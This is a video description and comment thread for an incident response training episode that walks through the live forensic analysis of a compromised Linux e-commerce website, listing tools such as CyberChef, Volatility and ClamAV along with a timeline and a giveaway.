Incident Response Training, Live Forensics of Compromised Website

With the continuation of my Incident Response Training Series, today I will be covering a Live Forensics for a Compromised Website running on Linux. So, this Episode is another Video for my Linux Forensics Series as well.

Also, I am giving away a couple of VIP Coupons for Let's Defend Lab and Blue Team Lab Online. So watch the episode to participate and grab your chance!!

This incident started when a eCommerce Website www.ella.com (Name changed) has been compromised and taken down by the hackers! The business was completely down as the website was the Web Portal for the company's shopping site. So, in this episode I will share you each and every step that I performed to find out what/how/when. This is a Live Incident Response and Forensics episode where we will go deeper in Linux. In this Episode,

👉 I will show you what got changed in the server to make the actual website unreachable and flashing a bizarre Message
👉 I will decode the full obfuscated code and identify the IOCs
👉 Analyze logs to identify how the attacker get into the server
👉 Will run a Self Made Tool (Power Forensics) to capture volatile data from the server. I will make the tool open-source once I complete the full project! So stay tuned for next Episodes
👉 Analyse the volatile data to identify more traces of Attacker

So it's a full detailed analysis of real SOC Incident and has in depth analysis. If you want to become a SOC analyst, want to work on real cyber incidents, if you are a absolute beginner or a experienced professional; each one of you should have something in this episode, in terms of learning and also get a opportunity to earn the Forensics Certification Examination voucher!! So, watch the full episode and ROCK in SOC!!

Tools I have used in this Episode-
👉 CyberChef
👉 Volatility Memory Forensics
👉 Power Forensics
👉 SIFT Workstation
👉 ClamAV

Related Episodes-


WATCH BELOW Playlists as well, if you want to make your career in DFIR and Security Operations!!


⌚
Timelines

0:00 ⏩ Pretty sketchy stuff!
2:04 ⏩ Background
5:06 ⏩ What has happened
6:47 ⏩ Login to host and Start Analysis
15:55 ⏩ Decode the Malicious Code
28:40 ⏩ Analyze Access Logs
44:14 ⏩ Run Power Forensics
50:51 ⏩ Analyze Volatile Data
1:04:55 ⏩ Run ClamScan
1:06:54 ⏩ Recap Analysis
1:10:11 ⏩ Report from ClamScan
1:14:16 ⏩ Let's Summarize


📞📲
FOLLOW ME EVERYWHERE-

✔ Twitter: @blackperl_dfir

SUPPORT BLACKPERL

╔═╦╗╔╦╗╔═╦═╦╦╦╦╗╔═╗
║╚╣║║║╚╣╚╣╔╣╔╣║╚╣═╣
╠╗║╚╝║║╠╗║╚╣║║║║║═╣
╚═╩══╩═╩═╩═╩╝╚╩═╩═╝
➡️ SUBSCRIBE, Share, Like, Comment

🙏 Thanks for watching!! Be CyberAware!! 🤞

BlackPerl

Informative and clear to the point, and participating in giveaway

amoghnellutla

this is great! looking forward to more such IR videos.

puneetkhandelwal

Amazing analysis pls keep adding these kind of videos.

raghu

Please use gf tool to search through entire site repo and you will find things quicker. Great job. Real saviour.

arunrmyt

Great content, keep up the good work!

Nick-snbl

Great video can we get some windows forensics, I take part in the raffle

Pancurek

Participating in giveaway, posted in LinkedIn. Thanks!!

vaibhavchaturvedi

Usually we don't get how exploitation is took place in Web Logs or IIS Logs, please share your views on this as well.

Dexter_Ops

Can you please explain windows forensic analysis investigation sir

RamaKrishna-lgzo

Sir I am participating for the giveaway. Already posted on LinkedIn. 😍

ShantanuDeyAnik

Sir, I am participating for giveaway. Already posted in LinkedIn

MoonSlayer

Sir, I am participating for giveaway. Already posted in LinkedIn

RamaKrishna-lgzo